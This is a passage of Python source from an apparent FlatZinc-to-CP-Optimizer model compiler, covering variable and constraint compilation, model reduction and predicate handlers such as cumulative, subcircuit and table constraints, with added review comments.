    # Compile variables
    for x in self.variables:
        self._compile_variable(x)
    # Compile constraints.
    # After reduction, the constraint list may also contain FznVariable
    # entries that were moved there so they are compiled after the
    # constraints that define their dependencies.
    if self.reduce:
        for x in self.constraints:
            if isinstance(x, FznVariable):
                self._compile_variable(x)
            else:
                self._compile_constraint(x)
    else:
        for x in self.constraints:
            self._compile_constraint(x)
    # Compile objective
    self._compile_objective(self.objective)
def _compile_parameter(self, fp):
    """ Compile a FZN parameter into CPO model
    Args:
        fp: Flatzinc parameter, object of class FznParameter
    """
    # Map the FZN type onto the matching CPO value type, using the
    # array variant when the parameter is an array.
    if fp.type in ('int', 'bool'):
        ctype = Type_IntArray if fp.size else Type_Int
        expr = CpoValue(fp.value, ctype)
    elif fp.type == 'float':
        ctype = Type_FloatArray if fp.size else Type_Float
        expr = CpoValue(fp.value, ctype)
    else:
        expr = build_cpo_expr(fp.value)
    # Register the named expression
    expr.set_name(fp.name)
    self.cpo_exprs[fp.name] = expr
def _compile_variable(self, fv):
    """ Compile a FZN variable into CPO model
    Args:
        fv: Flatzinc variable
    """
    # Check if variable is array
    val = fv.value
    if fv.size:
        # Build array of variables
        if val:
            # Check if there is a reference to a not yet defined variable
            if self.reduce:
                for v in val:
                    if v in self.def_var_exprs:
                        # Defer: compile again once the defining
                        # constraint has been processed.
                        self.def_var_exprs[v].append(fv)
                        return
            arr = [self._get_cpo_expr(e) for e in val]
            expr = CpoValue(arr, Type_IntVarArray if all(x.type == Type_IntVar for x in arr) else Type_IntExprArray)
        else:
            # Build array of variables
            arr = [integer_var(name=fv.name + '[' + str(i + 1) + ']', domain=fv.domain) for i in range(fv.size)]
            expr = CpoValue(arr, Type_IntVarArray)
    else:
        # Build single variable
        if self.reduce and val:
            # With reduction, a valued variable becomes a plain constant
            # or the expression it aliases.
            if is_int(val):
                expr = CpoValue(val, Type_Int)
            elif is_bool(val):
                expr = CpoValue(val, Type_Bool)
            else:
                expr = self._get_cpo_expr(val)
        else:
            # Check if value is another variable
            if isinstance(val, FznVariable):
                # Retrieve existing variable
                expr = self.cpo_exprs.get(val.name)
                assert isinstance(expr, CpoIntVar), "Variable '{}' not found".format(val.name)
            else:
                # Create new variable
                dom = _build_domain(val) if val else fv.domain
                expr = integer_var(domain=dom)
    expr.set_name(fv.name)
    self.cpo_exprs[fv.name] = expr
def _compile_constraint(self, fc):
    """ Compile a FZN constraint into CPO model
    Args:
        fc: Flatzinc constraint
    """
    # Dispatch to the compile method named after the predicate
    handler = getattr(self, "_compile_pred_" + fc.predicate, None)
    if handler is None:
        raise FznParserException("Predicate '{}' is not supported.".format(fc.predicate))
    handler(fc)
def _compile_objective(self, fo):
    """ Compile a FZN objective into CPO model
    Args:
        fo: Flatzinc objective
    """
    # Nothing to add for a missing objective or a plain 'satisfy'
    if fo is None or fo.operation == 'satisfy':
        return
    expr = self._get_cpo_expr(fo.expr)
    if fo.operation == 'maximize':
        oxpr = modeler.maximize(expr)
    else:
        oxpr = modeler.minimize(expr)
    self._add_to_model(oxpr)
def _reduce_model(self):
    """ Reduce model size by factorizing expressions when possible
    """
    # Access main model elements
    variables = self.variables
    constraints = self.constraints
    # Build reduction data related to variables
    for fv in variables:
        # Build list of variables that are referenced by this one
        fv.ref_vars = tuple(v for v in fv.value if isinstance(v, FznVariable)) if fv.size else ()
        # Set in defined variables if output
        if fv.is_output():
            self.cpo_variables.add(fv.name)
    # In constraints, replace reference to arrays by arrays themselves
    for fc in constraints:
        fc.args = tuple(a.value if isinstance(a, FznVariable) and a.size else a for a in fc.args)
    # Initialize set of variables defined in constraints
    def_var_map = {}  # Key is variable, value is constraint where variable is defined
    for fc in constraints:
        # print("Scan constraint {}".format(fc))
        defvar = fc.defvar
        if defvar is not None:
            def_var_map[defvar] = fc
        # Build list of all variables referenced by this constraint
        res = set()
        nbrefdvar = 0
        for v in fc._ref_vars_iterator():
            if v is defvar:
                nbrefdvar += 1
            else:
                res.add(v)
        fc.ref_vars = tuple(res)
        # Special case for cumulative. All variables are supposed defined by the constraint.
        if fc.predicate == 'cumulative':
            for v in fc.ref_vars:
                def_var_map[v] = fc
        # print("   result list of ref variables: {}".format(fc.ref_vars))
        # If defined variable is referenced twice in the constraint, remove it as defined (keep as declared variable)
        if nbrefdvar > 1:
            fc.defvar = None
            self.cpo_variables.add(defvar.name)
    # Determine connected variable subsets
    #self._determine_connex_variables(def_var_map)
    # Scan variables to move them after definition of their dependencies when needed
    variables = []  # New list of variables
    for fv in self.variables:
        #print("Scan variable {}, Refvars: {}".format(fv, [v.name for v in fv.ref_vars]))
        if any(v in def_var_map for v in fv.ref_vars):
            if self._insert_in_constraints(fv, 0, def_var_map):
                # Remove from list of variables (moved in constraints)
                pass
            else:
                # Keep it as a model variable
                self.cpo_variables.add(fv.name)
                variables.append(fv)
        else:
            variables.append(fv)
    self.variables = variables
    # Reorder constraints
    #print("\nScan constraints. Defined vars: {}".format([v.name for v in defined_vars]))
    constraints = self.constraints
    nbct = len(constraints)
    movedcstr = set()  # Constraints already moved
    cx = 0
    while cx < nbct:
        fc = constraints[cx]
        #print("Scan constraint {}. Refvars: {}".format(fc, [v.name for v in fc.ref_vars]))
        #print("Defined vars: {}".format([v.name for v in defined_vars]))
        # Process case of variable that has been inserted in constraints
        if isinstance(fc, FznVariable):
            def_var_map.pop(fc, None)
        else:
            # Search if constraint can be moved
            if (fc not in movedcstr) and (fc.predicate != "cumulative") \
                    and any(v in def_var_map for v in fc.ref_vars) \
                    and self._insert_in_constraints(fc, cx + 1, def_var_map):
                # Move constraint after all is defined.
                # Net index change is zero (cx -= 1 then cx += 1 below), so
                # the element shifted into this slot is examined next.
                del constraints[cx]
                movedcstr.add(fc)
                cx -= 1
            else:
                # Constraint stays where it is
                if fc.defvar:
                    def_var_map.pop(fc.defvar, None)
        cx += 1
    # print("Reduction ended.")
    # print("   Variables:")
    # for v in self.variables:
    #     print("      {}".format(v))
    # print("   Constraints:")
    # for c in self.constraints:
    #     print("      {}".format(c))
def _insert_in_constraints(self, fc, cx, varsctsr):
    """ Insert a constraint or a variable in constraints after all its members are defined
    Args:
        fc: FZN constraint or variable to insert
        cx: Start insertion index
        varsctsr: Map of constraints where each variable is defined
    Return:
        True if insertion was successful, False otherwise
    """
    # Build set of constraints to skip to wait for variable definition
    cset = set(varsctsr[v] for v in fc.ref_vars if v in varsctsr)
    # Check no dependency: nothing to wait for, caller keeps fc where it is
    if not cset:
        return False
    # Search in next constraints for the last defining constraint
    constraints = self.constraints
    # NOTE(review): 'xrange' is not a Python 3 builtin; presumably imported from
    # a py2/py3 compat module elsewhere in this file -- TODO confirm.
    for ix in xrange(cx, len(constraints)):
        cset.discard(constraints[ix])
        if not cset:
            # All dependencies seen: insert right after this place
            constraints.insert(ix + 1, fc)
            # print("   inserted at best rank {}".format(cx + 1))
            return True
    # Impossible to insert (some defining constraint is located before cx)
    # print("   impossible to insert")
    return False
def _determine_connex_variables(self, def_var_map):
    """ Search connex sub-graphes in variables dependencies and put all multi-variables connex parts as cpo variables
    Args:
        def_var_map: Map of constraints where variable is defined
    NOTE(review): the only call site visible in this file is commented out
    (in _reduce_model) -- this method appears to be currently unused.
    """
    # Create result map. Key is variable descriptor, value is set of connected variable descriptors
    lcomps = {}
    # For each variable, build the list of depending variables (BFS over references)
    for fv in self.variables:
        stack = [fv]
        dset = set(stack)
        while stack:
            sv = stack.pop(0)
            for v in sv.ref_vars:
                if v not in dset:
                    if v in lcomps:
                        # Component of v already computed: merge it wholesale
                        dset.update(lcomps[v])
                    else:
                        dset.add(v)
                        stack.append(v)
            # Also follow variables referenced by the constraint defining sv
            fc = def_var_map.get(fv)
            if fc:
                for v in fc.ref_vars:
                    if v not in dset:
                        #print(" cstr.ref: {}".format(v))
                        if v in lcomps:
                            dset.update(lcomps[v])
                        else:
                            dset.add(v)
                            stack.append(v)
        lcomps[fv] = dset
    # Sort all variables list in ascending cardinality order
    #print("Variables graphs:")
    #for k, v in lcomps.items():
    #    print(" {}: {}".format(k.name, [x.name for x in v]))
    lcomps = sorted(lcomps.values(), key=lambda x: len(x))
    # Remove each set in next ones (keep each variable in a single component)
    nbcomps = len(lcomps)
    for x1 in range(nbcomps):
        s1 = lcomps[x1]
        if s1:
            for x2 in range(x1 + 1, nbcomps):
                lcomps[x2] = lcomps[x2].difference(s1)
    # Set as model variables all that are in component with at least two variables
    for c in lcomps:
        #print(" graph component: {}".format([x.name for x in c]))
        if len(c) > 1:
            for v in c:
                self.cpo_variables.add(v.name)
    #print("CPO model variables identified: {}".format([v for v in self.cpo_variables]))
def _get_cpo_expr(self, expr):
    """ Retrieve a CPO expression from its FZN representation
    Args:
        expr: FZN expression
    Returns:
        Corresponding CPO expression
    Raises:
        FznParserException: if the FZN element cannot be resolved
    """
    #print(" _get_cpo_expr({}, type={})".format(expr, type(expr)))
    # Check basic types: named FZN elements resolve through the expression map
    etyp = type(expr)
    if etyp in (FznVariable, FznParameter):
        v = self.cpo_exprs.get(expr.name)
        if v is None:
            raise FznParserException("Can not find element {}".format(expr.name))
        return v
    # Integer constant
    if etyp in INTEGER_TYPES:
        return CpoValue(expr, Type_Int)
    # Array: convert each element recursively
    if etyp is list:
        return build_cpo_expr([self._get_cpo_expr(x) for x in expr])
    # Check array access
    if etyp is tuple:
        # Tuple of integers: (min, max) range expanded to a list, or single value
        if is_int(expr[0]):
            if len(expr) > 1:
                return [i for i in range(expr[0], expr[1] + 1)]
            return [expr[0]]
        # Access to array element; FZN indexes are 1-based, hence the -1
        arr = self.cpo_exprs.get(expr[0].name)
        if arr is None:
            raise FznParserException("Can not find array {}".format(expr[0]))
        return(arr.value[expr[1]-1])
    # Boolean constant mapped to 0/1 CPO value
    if etyp in BOOL_TYPES:
        return CpoValue(1, Type_Bool) if expr else CpoValue(0, Type_Bool)
    # String: lookup by name
    if etyp in STRING_TYPES:
        v = self.cpo_exprs.get(expr)
        if v is None:
            raise FznParserException("Can not find element {}".format(expr))
        return v
    # Unknown
    raise FznParserException("Can not find element {}".format(expr))
# Array predicates
# All array element predicates share the same compilation scheme r = t[x]
# (see _compile_array_xxx_element); only the declared FZN element type differs.
def _compile_pred_array_bool_element(self, fc):
    self._compile_array_xxx_element(fc)
def _compile_pred_array_int_element(self, fc):
    self._compile_array_xxx_element(fc)
def _compile_pred_array_float_element(self, fc):
    self._compile_array_xxx_element(fc)
def _compile_pred_array_var_bool_element(self, fc):
    self._compile_array_xxx_element(fc)
def _compile_pred_array_var_int_element(self, fc):
    self._compile_array_xxx_element(fc)
def _compile_pred_array_var_float_element(self, fc):
    self._compile_array_xxx_element(fc)
def _compile_pred_array_bool_and(self, fc):
    # AND over a 0/1 array is its minimum
    self._compile_op_assign_arg_1(fc, modeler.min_of)
def _compile_pred_array_bool_or(self, fc):
    # OR over a 0/1 array is its maximum
    self._compile_op_assign_arg_1(fc, modeler.max_of)
# Bool predicates
# '_reif' variants bind the truth value of the relation to an extra result argument.
def _compile_pred_bool_and(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.logical_and)
def _compile_pred_bool_or(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.logical_or)
def _compile_pred_bool_xor(self, fc):
    # xor on 0/1 values is plain inequality
    self._compile_op_assign_arg_2(fc, modeler.diff)
def _compile_pred_bool_not(self, fc):
    self._compile_op_assign_arg_1(fc, modeler.logical_not)
def _compile_pred_bool_eq(self, fc):
    self._compile_xxx_eq(fc)
def _compile_pred_bool_eq_reif(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.equal)
def _compile_pred_bool_le(self, fc):
    self._compile_op_arg_2(fc, modeler.less_or_equal)
def _compile_pred_bool_le_reif(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.less_or_equal)
def _compile_pred_bool_lin_eq(self, fc):
    self._compile_scal_prod(fc, modeler.equal)
def _compile_pred_bool_lin_le(self, fc):
    self._compile_scal_prod(fc, modeler.less_or_equal)
def _compile_pred_bool_lt(self, fc):
    self._compile_op_arg_2(fc, modeler.less)
def _compile_pred_bool_lt_reif(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.less)
def _compile_pred_bool2int(self, fc):
    # bool and int share the same 0/1 representation: plain equality
    self._compile_xxx_eq(fc)
# Float predicates
def _compile_pred_float_abs(self, fc):
    self._compile_op_assign_arg_1(fc, modeler.abs_of)
def _compile_pred_float_exp(self, fc):
    self._compile_op_assign_arg_1(fc, modeler.exponent)
def _compile_pred_float_ln(self, fc):
    self._compile_op_assign_arg_1(fc, modeler.log)
def _compile_pred_float_log10(self, fc):
    # log10(a) = ln(a) / ln(10)
    a, r = fc.args
    self._make_equal(r, modeler.log(self._get_cpo_expr(a)) / modeler.log(10), fc.defvar)
def _compile_pred_float_log2(self, fc):
    # log2(a) = ln(a) / ln(2)
    a, r = fc.args
    self._make_equal(r, modeler.log(self._get_cpo_expr(a)) / modeler.log(2), fc.defvar)
def _compile_pred_float_sqrt(self, fc):
    # sqrt(a) = a ** 0.5
    a, r = fc.args
    self._make_equal(r, modeler.power(self._get_cpo_expr(a), 0.5), fc.defvar)
def _compile_pred_float_eq(self, fc):
    self._compile_xxx_eq(fc)
def _compile_pred_float_eq_reif(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.equal)
def _compile_pred_float_le(self, fc):
    self._compile_op_arg_2(fc, modeler.less_or_equal)
def _compile_pred_float_le_reif(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.less_or_equal)
def _compile_pred_float_lin_eq(self, fc):
    self._compile_scal_prod(fc, modeler.equal)
def _compile_pred_float_lin_le(self, fc):
    self._compile_scal_prod(fc, modeler.less_or_equal)
def _compile_pred_float_lin_lt(self, fc):
    """ Compile FZN predicate float_lin_lt: strict 'scal_prod(coefs, vars) < res'.

    Args:
        fc: Constraint descriptor
    """
    # BUG FIX: was 'modeler.lesst', a nonexistent attribute that raised
    # AttributeError whenever this predicate occurred. Sibling strict-less
    # predicates (int_lt, float_lt, float_lin_lt_reif) all use modeler.less.
    self._compile_scal_prod(fc, modeler.less)
def _compile_pred_float_lin_ne(self, fc):
    self._compile_scal_prod(fc, modeler.diff)
# '_reif' linear variants pass True so the relation is reified into the last argument.
def _compile_pred_float_lin_eq_reif(self, fc):
    self._compile_scal_prod(fc, modeler.equal, True)
def _compile_pred_float_lin_le_reif(self, fc):
    self._compile_scal_prod(fc, modeler.less_or_equal, True)
def _compile_pred_float_lin_lt_reif(self, fc):
    self._compile_scal_prod(fc, modeler.less, True)
def _compile_pred_float_lin_ne_reif(self, fc):
    self._compile_scal_prod(fc, modeler.diff, True)
def _compile_pred_float_lt(self, fc):
    self._compile_op_arg_2(fc, modeler.less)
def _compile_pred_float_lt_reif(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.less)
def _compile_pred_float_max(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.max_of)
def _compile_pred_float_min(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.min_of)
def _compile_pred_float_ne(self, fc):
    self._compile_op_arg_2(fc, modeler.diff)
def _compile_pred_float_ne_reif(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.diff)
def _compile_pred_float_plus(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.plus)
# Int predicates
def _compile_pred_int_abs(self, fc):
    self._compile_op_assign_arg_1(fc, modeler.abs_of)
def _compile_pred_int_div(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.int_div)
def _compile_pred_int_eq(self, fc):
    self._compile_xxx_eq(fc)
def _compile_pred_int_eq_reif(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.equal)
def _compile_pred_int_le(self, fc):
    self._compile_op_arg_2(fc, modeler.less_or_equal)
def _compile_pred_int_le_reif(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.less_or_equal)
def _compile_pred_int_lin_eq(self, fc):
    self._compile_scal_prod(fc, modeler.equal)
def _compile_pred_int_lin_le(self, fc):
    self._compile_scal_prod(fc, modeler.less_or_equal)
def _compile_pred_int_lin_ne(self, fc):
    self._compile_scal_prod(fc, modeler.diff)
def _compile_pred_int_lin_eq_reif(self, fc):
    self._compile_scal_prod(fc, modeler.equal, True)
def _compile_pred_int_lin_le_reif(self, fc):
    self._compile_scal_prod(fc, modeler.less_or_equal, True)
def _compile_pred_int_lin_ne_reif(self, fc):
    self._compile_scal_prod(fc, modeler.diff, True)
def _compile_pred_int_lt(self, fc):
    self._compile_op_arg_2(fc, modeler.less)
def _compile_pred_int_lt_reif(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.less)
def _compile_pred_int_max(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.max_of)
def _compile_pred_int_min(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.min_of)
def _compile_pred_int_mod(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.mod)
def _compile_pred_int_ne(self, fc):
    self._compile_op_arg_2(fc, modeler.diff)
def _compile_pred_int_ne_reif(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.diff)
def _compile_pred_int_plus(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.plus)
def _compile_pred_int_times(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.times)
def _compile_pred_int2float(self, fc):
    # int and float values compare directly: plain equality
    self._compile_xxx_eq(fc)
# Set predicates
def _compile_pred_set_in(self, fc):
    # set membership expressed as an allowed-assignments (table) constraint
    self._compile_op_arg_2(fc, modeler.allowed_assignments)
def _compile_pred_set_in_reif(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.allowed_assignments)
# Custom predicates
def _compile_pred_all_different_int(self, fc):
    self._compile_op_arg_1(fc, modeler.all_diff)
def _compile_pred_count_eq_const(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.count)
def _compile_pred_lex_lesseq_int(self, fc):
    self._compile_op_arg_2(fc, modeler.lexicographic)
def _compile_pred_lex_lesseq_bool(self, fc):
    self._compile_op_arg_2(fc, modeler.lexicographic)
def _compile_pred_int_pow(self, fc):
    self._compile_op_assign_arg_2(fc, modeler.power)
def _compile_pred_cumulative(self, fc):
    """ Requires that a set of tasks given by start times s, durations d, and resource requirements r,
    never require more than a global resource bound b at any one time.

    Each FZN task is converted into a CPO interval variable plus a pulse
    contribution; the final constraint states sum(pulses) <= bound.

    Args:
        fc: Constraint descriptor, with arguments
            stime: Tasks start time
            tdur: Tasks durations
            rreq: Task resource requirements
            bnd: Global resource bound
    """
    #print("Process cumulative constraint {}".format(fc))
    # Access constraint arguments
    stime, tdur, rreq, bnd = fc.args
    # Create interval vars and cumul atoms
    ls = _get_fzn_array(stime)
    ld = _get_fzn_array(tdur)
    lr = _get_fzn_array(rreq)
    #print("ls: {}\nld: {}\nlr: {}".format(ls, [s for s in ld], lr))
    cumul_atoms = []
    for s, d, r in zip(ls, ld, lr):
        vname = None  # base name of the interval variable (first FZN variable found)
        # Get start time bounds; constants become a degenerate (v, v) domain
        if isinstance(s, FznVariable):
            ds = s._get_domain_bounds()
            vname = s.name
        else:
            ds = (s, s)
        # Get duration bounds
        if isinstance(d, FznVariable):
            dd = d._get_domain_bounds()
            if vname is None:
                vname = d.name
        else:
            dd = (d, d)
        # Get requirement bounds
        if isinstance(r, FznVariable):
            dr = r._get_domain_bounds()
            if vname is None:
                vname = r.name
        else:
            dr = (r, r)
        #print("ds: {}, dd: {}, dr: {}".format(ds, dd, dr))
        # Choose a unique interval variable name
        if vname is None:
            # Fully-constant task: allocate a generated name
            vname = self.interval_gen.allocate()
        else:
            vname = "Itv_" + vname
            # Disambiguate with a numeric suffix if the name is already taken
            if vname in self.cpo_exprs:
                cnt = 1
                nname = vname + "_1"
                while nname in self.cpo_exprs:
                    cnt += 1
                    nname = vname + "_" + str(cnt)
                vname = nname
        # Create interval variable
        # NOTE(review): after the disambiguation above, vname should never be
        # present in cpo_exprs, which would make the 'if ivar:' branch
        # unreachable -- TODO confirm whether reuse is actually possible.
        ivar = self.cpo_exprs.get(vname)
        if ivar:
            # Check it is the same
            assert isinstance(ivar, CpoIntervalVar) and ivar.get_start() == ds and ivar.get_size() == dd and ivar.get_end() == (INTERVAL_MIN, INTERVAL_MAX)
        else:
            ivar = interval_var(start=ds, end=(INTERVAL_MIN, INTERVAL_MAX), size=dd, name=vname)
            self.cpo_exprs[vname] = ivar
        # Create pulse (resource usage over the interval)
        pulse = modeler.pulse(ivar, dr)
        cumul_atoms.append(pulse)
        # Replace previous variable by access to interval variable
        if isinstance(s, FznVariable):
            self._assign_to_var(s, modeler.start_of(ivar))
        if isinstance(d, FznVariable):
            self._assign_to_var(d, modeler.size_of(ivar))
        if isinstance(r, FznVariable):
            self._assign_to_var(r, modeler.height_at_start(ivar, pulse))
    # Create final constraint: bound >= sum of all pulses
    cumf = CpoFunctionCall(Oper_sum, Type_CumulFunction, (CpoValue(cumul_atoms, Type_CumulAtomArray),))
    self._add_to_model(modeler.greater_or_equal(self._get_cpo_expr(bnd), cumf))
def _compile_pred_subcircuit(self, fc):
    """ Constrains the elements of x to define a subcircuit where x[i] = j means that j is the successor of i and x[i] = i means that i is not in the circuit.
    """
    # FZN arrays are 1-based; prepend a dummy 0 so indexes line up
    x = [0] + list(self._get_cpo_expr(fc.args[0]).value)
    self._add_to_model(CpoFunctionCall(Oper__sub_circuit, Type_Constraint, (build_cpo_expr(x),)))
def _compile_pred_inverse(self, fc):
    """ Constrains two arrays of int variables, f and invf, to represent inverse functions. All the values in each array must be within the index set of the other array.
    Args:
        f: First function as array of int
        invf: Inverse function
    """
    f, invf = fc.args
    # FZN arrays are 1-based: prepend a dummy element at index 0 of each array
    f = [0] + list(self._get_cpo_expr(f).value)
    invf = [0] + list(self._get_cpo_expr(invf).value)
    self._add_to_model(CpoFunctionCall(Oper_inverse, Type_Constraint, (build_cpo_expr(f), build_cpo_expr(invf))))
def _compile_pred_bool_clause(self, fc):
    """ Implementation of bool_clause predicate: (OR a_i) OR (OR not b_j).

    Encoded arithmetically as sum(a) + sum(1 - b) >= 1.

    Args:
        a: First array of booleans (positive literals)
        b: Second array of booleans (negated literals)
    """
    a, b = fc.args
    # Default implementation
    exprs = list(self._get_cpo_expr(a).value)
    for x in self._get_cpo_expr(b).value:
        exprs.append(1 - x)  # not(b_j) on 0/1 values
    self._add_to_model(modeler.sum_of(exprs) >= 1)
    # Alternative implementation
    # self._add_to_model( (modeler.max_of(a) > 0) | (modeler.min_of(b) == 0) )
    # Other alternative implementation
    # expr = None
    # for x in _get_value(a):
    #     x = x > 0
    #     expr = x if expr is None else modeler.logical_or(expr, x)
    # for x in _get_value(b):
    #     x = x == 0
    #     expr = x if expr is None else modeler.logical_or(expr, x)
    # self._add_to_model(expr)
def _compile_pred_table_int(self, fc):
    """ Implement custom predicate table_int
    Args:
        vars: Array of variables
        values: Flat list of values, row-major, one row per allowed tuple
    """
    vars, values = fc.args
    # Split the flat value array into tuples of len(vars) elements
    vars = self._get_cpo_expr(vars).value
    tsize = len(vars)
    if tsize != 0:  # empty variable array: nothing to constrain
        values = self._get_cpo_expr(values).value
        tuples = [values[i: i + tsize] for i in range(0, len(values), tsize)]
        # Build allowed assignment expression
        self._add_to_model(modeler.allowed_assignments(vars, tuples))
def _compile_pred_lex_less_bool(self, fc):
    """ Requires that the array vars1 is strictly lexicographically less than array vars2
    Args:
        vars1: First array of variables
        vars2: Second array of variables
    """
    vars1, vars2 = fc.args
    # CPO lexicographic() is non-strict; appending 1 to vars1 and 0 to vars2
    # forces strict inequality when the prefixes are equal.
    vars1 = list(self._get_cpo_expr(vars1).value) + [1]
    vars2 = list(self._get_cpo_expr(vars2).value) + [0]
    self._add_to_model(modeler.lexicographic(vars1, vars2))
def _compile_pred_lex_less_int(self, fc):
    # Same encoding works for integer arrays
    self._compile_pred_lex_less_bool(fc)
def _get_domain_bounds(self, x):
    """ Get min and max bounds of an expression, integer variable or integer
    Args:
        x: CPO integer variable or expression
    Returns:
        Tuple (min, max)
    Raises:
        FznParserException: if bounds cannot be determined for a function call
    """
    # Case of variable or variable replaced by an expression
    if isinstance(x, CpoIntVar):
        return (x.get_domain_min(), x.get_domain_max())
    if isinstance(x, CpoFunctionCall):
        # start_of/size_of expressions: bounds come from the interval variable
        if x.operation is Oper_start_of:
            return x.children[0].get_start()
        if x.operation is Oper_size_of:
            return x.children[0].get_size()
        # if x.is_kind_of(Type_BoolExpr):
        #     return (0, 1)
        # Fall back to the variable registered under the same name, if any
        cpov = self.cpo_exprs.get(x.name)
        if isinstance(cpov, CpoIntVar):
            return (cpov.get_domain_min(), cpov.get_domain_max())
        raise FznParserException("Unknow expression to take bounds from: {}".format(x))
    if isinstance(x, CpoValue):
        x = x.value
    # Plain integer constant: degenerate domain
    if is_int(x):
        return (x, x)
    # NOTE(review): anything else is returned as-is -- assumed to already be a
    # (min, max) tuple; TODO confirm with callers.
    return x
def _assign_to_var(self, var, expr):
    """ Set a identifier with an expression
    Args:
        var: Target FZN variable
        expr: CPO expression to assign
    Returns:
        None. If needed, changes are done in reader context.
    """
    #print("_assign_to_var {} expression {}".format(var, expr))
    # Retrieve existing expression registered under this variable name
    vname = var.name
    vexpr = self.cpo_exprs.get(vname)
    # Check if reduction is possible; a variable that must stay materialized
    # (reduction off, already a CPO model variable, or already substituted by
    # a non-variable expression) is constrained to equal the expression instead
    if (not self.reduce) or (vname in self.cpo_variables) or (vexpr is not None and not isinstance(vexpr, CpoIntVar)):
        self._add_to_model(modeler.equal(vexpr, expr))
    else:
        # Substitute the variable by the expression itself (model reduction)
        self.cpo_exprs[vname] = expr
        expr.set_name(vname)
        # Constrain expression to variable domain
        self._constrain_expr_domain(expr, var)
def _make_equal(self, var, expr, dvar):
    """ Make equal two FZN expressions
    Args:
        var: FZN variable or value
        expr: CPO expression to be equal with
        dvar: Defined variable of the constraint, None if none
    Returns:
        None. If needed, changes are done in reader context.
    """
    # Check if var is not a variable: plain equality constraint
    if not isinstance(var, FznVariable):
        self._add_to_model(modeler.equal(expr, self._get_cpo_expr(var)))
        return
    # Check no reduction: substitution only allowed for the defined variable
    if not self.reduce or (dvar is not var):
        self._add_to_model(modeler.equal(self._get_cpo_expr(var), expr))
        return
    # Assign expression to the defined variable (model reduction)
    self._assign_to_var(var, expr)
def _constrain_expr_domain(self, expr, var):
    """ Constrain the domain of an expression to the domain of a variable
    Args:
        expr: CPO expression to constrain
        var: CPO or FZN integer var to take domain from
    """
    dom = var.domain
    #print(" constrain expression {} to domain {}".format(expr, dom))
    dmin = expression.get_domain_min(dom)
    dmax = expression.get_domain_max(dom)
    # Check boolean expression: a 0..1 domain needs no extra constraint
    if dmin == 0 and dmax == 1:
        return
    # A boolean expression already lies in 0..1; skip if the domain covers it
    if expr.is_kind_of(Type_BoolExpr) and (dmin <= 0) and (dmax >= 1):
        return
    # Add appropriate constraint
    if len(dom) == 1:  # Single segment
        # Use range (or plain equality for a singleton domain)
        if dmin == dmax:
            self._add_to_model(modeler.equal(expr, dmin))
        else:
            self._add_to_model(modeler.range(expr, dmin, dmax))
    else:
        # Multi-segment domain: enumerate values with allowed assignments
        self._add_to_model(modeler.allowed_assignments(expr, expression._domain_iterator(dom)))
def _compile_op_assign_arg_1(self, fc, op):
    """ Compile an operation on a single argument whose result is assigned.

    Args:
        fc: Constraint descriptor
        op: CPO operation to apply to the first argument
    """
    arg, result = fc.args
    self._make_equal(result, op(self._get_cpo_expr(arg)), fc.defvar)
def _compile_op_assign_arg_2(self, fc, op):
    """ Compile an operation on two arguments whose result is assigned.

    Args:
        fc: Constraint descriptor
        op: CPO operation to apply to the two arguments
    """
    lhs, rhs, result = fc.args
    value = op(self._get_cpo_expr(lhs), self._get_cpo_expr(rhs))
    self._make_equal(result, value, fc.defvar)
def _compile_op_arg_1(self, fc, op):
    """ Compile an operation on one argument with no result to assign.

    Args:
        fc: Constraint descriptor
        op: CPO operation to apply to the argument
    """
    operand = self._get_cpo_expr(fc.args[0])
    self._add_to_model(op(operand))
def _compile_op_arg_2(self, fc, op):
    """ Compile an operation on two arguments with no result to assign.

    Args:
        fc: Constraint descriptor
        op: CPO operation to apply to the two arguments
    """
    lhs, rhs = fc.args
    self._add_to_model(op(self._get_cpo_expr(lhs), self._get_cpo_expr(rhs)))
def _compile_array_xxx_element(self, fc):
    """ Compile access to array element: r = t[x].

    Args:
        fc: Constraint descriptor with args (x: index, t: array, r: result)
    """
    x, t, r = fc.args
    if not is_int(x):
        x = self._get_cpo_expr(x)
    # FZN arrays are 1-based while CPO element() is 0-based, hence x - 1
    self._make_equal(r, modeler.element(self._get_cpo_expr(t), x - 1), fc.defvar)
def _compile_xxx_eq(self, fc):
    """ Compile all equality predicates (bool_eq, int_eq, float_eq, bool2int, int2float) """
    # Access constraint arguments
    a, b = fc.args
    # Check default case: no reduction, add a plain equality constraint
    if not self.reduce:
        self._add_to_model(modeler.equal(self._get_cpo_expr(a), self._get_cpo_expr(b)))
        return
    # Process trivial cases: x == x is always true
    if a is b:
        return None
    # Retrieve defined variable; without one, no substitution is possible
    defvar = fc.defvar
    if defvar is None:
        self._add_to_model(modeler.equal(self._get_cpo_expr(a), self._get_cpo_expr(b)))
        return
    # Substitute the defined side by the other side's expression
    if defvar is a:
        self._assign_to_var(a, self._get_cpo_expr(b))
    else:
        self._assign_to_var(b, self._get_cpo_expr(a))
def _compile_scal_prod(self, fc, op, reif=False):
    """ Compile a scalar product constraint: op(scal_prod(coefs, vars), res).

    Args:
        fc: Constraint
        op: Comparison operation
        reif: True when the constraint has a fourth, reifying argument
    """
    # Access constraint arguments
    # NOTE(review): when reif is True the parameter is rebound to the reifying
    # FZN variable itself; the later 'if reif:' tests rely on that object being
    # truthy -- assumed to always hold, TODO confirm.
    if reif:
        coefs, vars, res, reif = fc.args
    else:
        coefs, vars, res = fc.args
